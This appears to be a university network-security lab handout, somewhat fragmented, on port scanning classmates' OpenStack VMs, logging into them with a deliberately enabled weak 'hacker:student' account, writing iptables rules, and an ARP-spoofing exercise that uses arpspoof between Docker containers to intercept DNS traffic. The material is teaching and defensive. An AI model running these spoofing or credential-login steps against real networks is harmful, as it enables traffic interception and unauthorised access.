Please spawn a virtual machine on openstack.
echo "<h1>Hello, I am "<insert your 31337 name here>" </h1>" | sudo tee /var/www/html/index.html # you may also append a slogan (choose one or make your own): echo '<h3>All your base are belong to us!</h3>' | sudo tee -a /var/www/html/index.html echo '<h3>We will rock you!</h3>' | sudo tee -a /var/www/html/index.html echo '<h3>Am talent și nu mă las!</h3>' | sudo tee -a /var/www/html/index.html
sudo passwd student # set an unbreakable password, but make sure you won't forget it until the end of the lab!
hacker
guest account for your # let the h4x0rs in (enables the account): sudo usermod -e -1 -U hacker
hacker
's password unchanged!
No trolling / spamming yet, please!
Read here about port scanning techniques.
For the following exercises, you should be working on an OpenStack VM, scanning for the VMs of your colleagues.
-p <port range>
for faster, directed scanning.netcat -u
server on your VM while the other scans for it.Iptables is an interface to the Netfilter firewall that is built into the Linux kernel. It provides an administrator with an interface to add, remove, and modify packet rules.
Here's a iptables cheeatsheet to help you get started.
Here are some best practices when writing firewall rules (read them):
-i | -o
), the source IP address (-s
), the destination IP address (-d
), the protocol and ports (-p <tcp|udp> --dport|sport <number>
.INPUT
chain, which includes the IP address of your workstation (in our case, the fep
will originate your ssh packets to OpenStack), so that you won’t get locked out. A rule for whitelisting your IP address at the top of the policy looks like this. Notice that Insert (-I) was used instead of Append (-A), because we want this rule to be the first. iptables -I INPUT -s "<FEP IP address>" -j ACCEPT
INPUT
chain for that.INPUT
).
fep
)!
curl
, read the message from his http server (check man / some examples if you never used it).hacker:student
credentials! When successful, send a broadcast message hacker@<colleague-VM>$ wall "Wazzaap?"
tcpdump
to see where ssh packets come from (make sure to ignore the ones coming from fep
):tcpdump -i eth0 'host not <FEP's IP address here>' # note the source IP of the other OpenStack VMs connecting to you!
ssh
(TCP port 22) and http
(TCP port 80) from any other OpenStack VMs addresses (recall the CIDR range?). Be extra careful not to ban yourself!ALLOW
rule before the ones dropping the packets!
wall
messages being displayed on your tty, check out man mesg
command!
But beware when nesting shells! (e.g., from student
to root
using su
). In this case, you must exit them all and issue mesg
on the first one (the tty spawned by ssh!).
iptables … -P DROP
):string
iptables module can do packet contents matching (sudo iptables -m string -help
). But what does a DNS query look like?|HH HH HH …|<plaintext>
(e.g., hello|20 57 6F|rld
) to match binary contents of a packet! Also choose a string matching algorithm!recent
iptables module!The ARP protocol is widely used for translating L3 (IP) addresses into L2 (data-link) addresses.
Unfortunately, it suffers from a critical security vulnerability: due to its unauthenticated nature, a destination machine has no way of determining whether a ARP reply is valid, so an attacker can forge ARP packets and tell a victim PC to associate the router's IP address to the attacker's MAC address, such that it will send all traffic through the victim's machine.
# turn on IP Forwarding -- for the attacker (inherited from host) # containers don't have permission for this and we don't want to bother with capabilities sudo sysctl -w net.ipv4.ip_forward=1 # Open a "Victim" terminal (on your VM): docker run --rm -ti --entrypoint /bin/bash --name victim ubuntu:22.04 # Open an "Attacker" terminal (also on the same VM): docker run --rm -ti --entrypoint /bin/bash --name attacker --sysctl net.ipv4.ip_forward=1 ubuntu:22.04 # we need two terminals for the attacker (for the tcpdump later) # so... in a third terminal, spawn a Docker exec shell: docker exec -ti attacker /bin/bash
apt update && apt install -y iproute2 iputils-ping netcat-openbsd ip a sh
# install prerequisites for this task apt update && apt install -y dsniff tcpdump iproute2 iputils-ping # start poisoning the host's ARP cache arpspoof -i <INTERFACE> -t <VICTIM_IP> <GATEWAY_IP> -r
tcpdump udp port 53 -nvvX
# check ARP table (your gateway's MAC should be the attacker's) ip nei sh # ping your favorite website ping my.secretwebsite.com # Unfortunately, IP forwarding inside container doesn't work :(
The tcpdump
capture on the Attacker terminal should show the intercepted DNS requests ;)
Please take a minute to fill in the feedback form for this lab.